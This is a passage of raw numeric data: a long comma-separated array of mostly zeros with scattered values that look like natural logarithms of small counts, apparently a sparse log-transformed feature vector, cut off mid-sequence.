0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, \n 0.0, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 2.1972245773362196, 0.0, \n 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.58351893845611, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.9957322735539913, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.302585092994046, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0, 2.4849066497880004, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.9384838577066197, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, \n 2.8398715690385097, 0.0, 3.649511027115099, 5.723585101952381, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 4.969640753475787, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 5.030437921392435, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.772588722239781, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.9512437185814275, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0,\n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 6.925410995016817, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 3.1354942159291497, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, \n 6.984716320118266, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 7.694848072384611, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.649511027115099,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 